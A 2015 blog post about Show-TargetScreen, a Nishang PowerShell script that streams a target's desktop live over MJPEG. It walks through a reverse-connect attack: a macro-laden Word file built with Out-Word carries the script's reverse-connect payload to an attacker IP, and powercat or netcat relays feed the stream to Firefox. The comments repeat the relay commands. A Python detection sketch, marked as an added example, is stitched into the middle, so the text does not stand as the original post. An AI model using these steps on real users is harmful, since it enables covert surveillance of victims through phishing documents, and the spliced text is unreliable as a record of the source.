Thursday, December 17, 2015

Stream a target's Desktop using MJPEG and PowerShell

Recently, I have been working on an interesting concept. I wanted to use MJPEG to stream images in real time from a target desktop to be able to see the activity of a target user. I literally spent weeks to get it working but in the end, it turned out that a small piece of PowerShell code could be used to achieve this. Anyway, I give you Show-TargetScreen.ps1. This script can stream a target's desktop in real time, and the stream can be viewed in browsers that support MJPEG (Firefox).

Show-TargetScreen is available in the Gather category of Nishang. The current source code looks like this:


Now, to use it for reverse connect, to avoid having to write a listener/server, I used powercat to run a local relay to which Show-TargetScreen connects and we point Firefox to the local port. So, start a powercat listener and relay to any local port. In the below command, Show-TargetScreen will connect to port 443 and Firefox will connect to port 9000:
Note that on a *nix machine, netcat could be used as well.

Now, to be able to stream a user's Desktop, Show-TargetScreen must be used with a client side attack. Let's use it with Out-Word from Nishang. Since, like other Nishang scripts, Show-TargetScreen.ps1 loads a function with the same name, we should pass an argument -"Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443", and use it as a payload for Out-Word.
Now, the generated doc file is to be sent to a target. As soon as a target user opens up the Word file, we will have a connect back on the powercat listener which will relay to the configured local port (TCP 9000 in this example).
Now, if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user's Desktop.
Awesome! Isn't it? I recently tried this in a couple of pen tests and was quite satisfied with the results.

A couple of things which I would like to improve in the future:
- Proxy support
- HTTPS Connection.
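
Seen from the defender's side, the reverse-connect flow above has a recognisable shape on the wire: the host that opens the TCP connection sends an HTTP response instead of a request, in cleartext, even on port 443. The sketch below is an added example (not part of Nishang or the original post) that flags that shape in the first bytes of a flow. It assumes the stream uses the common MJPEG-over-HTTP framing (`multipart/x-mixed-replace`), which the post does not spell out; `classify_flow` and the sample byte strings are hypothetical and constructed.

```python
import re

JPEG_SOI = b"\xff\xd8\xff"   # JPEG start-of-image marker
TLS_RECORD = b"\x16\x03"     # handshake record that opens a real TLS session

def classify_flow(dst_port, initiator_bytes):
    """Findings for the first bytes sent by the side that opened the TCP connection."""
    findings = []
    head, _, body = initiator_bytes.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    # A connection initiator normally sends a request line; a status line
    # means the "client" is actually serving content over a reverse connect.
    if re.match(rb"HTTP/1\.[01] \d{3}", lines[0]):
        findings.append("initiator-sent-http-response")
    # The post lists HTTPS as future work, so the stream is cleartext even on 443.
    if dst_port == 443 and not initiator_bytes.startswith(TLS_RECORD):
        findings.append("cleartext-on-443")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip().lower()
    # Assumed framing: multipart/x-mixed-replace with JPEG parts.
    if headers.get(b"content-type", b"").startswith(b"multipart/x-mixed-replace"):
        if body.count(JPEG_SOI) >= 1:
            findings.append("mjpeg-stream")
    return findings

# Constructed samples (not captured traffic).
MJPEG_REVERSE = (b"HTTP/1.1 200 OK\r\n"
                 b"Content-Type: multipart/x-mixed-replace; boundary=frame\r\n\r\n"
                 b"--frame\r\nContent-Type: image/jpeg\r\n\r\n"
                 + JPEG_SOI + b"\xe0\x00\x10JFIF")
TLS_HELLO = TLS_RECORD + b"\x01\x02\x00\x01\x00\x01\xfc\x03\x03"
PLAIN_GET = b"GET / HTTP/1.1\r\nHost: intranet.example\r\n\r\n"

if __name__ == "__main__":
    for name, port, data in [("mjpeg", 443, MJPEG_REVERSE),
                             ("tls", 443, TLS_HELLO), ("get", 80, PLAIN_GET)]:
        print(name, classify_flow(port, data))
```

Any one finding is weak on its own; the combination of a status line from the initiator and non-TLS bytes on 443 is the part worth alerting on.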

Feel free to suggest improvements and submit pull requests. Feedback and comments are welcome.

10 comments:

  1. Please explain this part: "As soon as a target user opens up the Word file ...". You probably meant "As soon as a target user opens up the Word file *and* then clicks on Enable Content in order to run the macro ...".
    Thanks

    1. You are right. The target user must Enable Content. I assumed that part when I wrote "As soon as a target user opens up the Word file". Thanks.

    2. I guess that's a critical assumption, but many people will eventually click enable.

      I would be interested to see how often this works.

  2. Hi, I'm having trouble understanding why the port relay is necessary. Is this something internal to MJPEG? Sorry if the question is noobish, I'm a student trying to learn more about penetration testing.
    Thanks

    1. Hi,

      The relay is necessary because, AFAIK, Firefox is unable to listen for connections. The local relay allows us to listen for a connect back and then Firefox could be used to connect to a local port. This eliminates the need to write a listener/server for the connect back.

    2. Oh, that makes sense. Thanks for the reply, really helped clarify my understanding.

  3. Can this be extended to enable remote control of the machine?

  4. Hi,

    Do I have to use powercat? Can I use netcat?
    If it's possible, can you show how to change it from powercat to netcat?

    powercat -l -v -p 443 -r tcp:9000 -rep -t 1000
    netcat ?

    1. Of course you can use netcat, this should work:
      nc -nlvp 443 | nc -nlvp 9000

    2. THX :) /VASCO
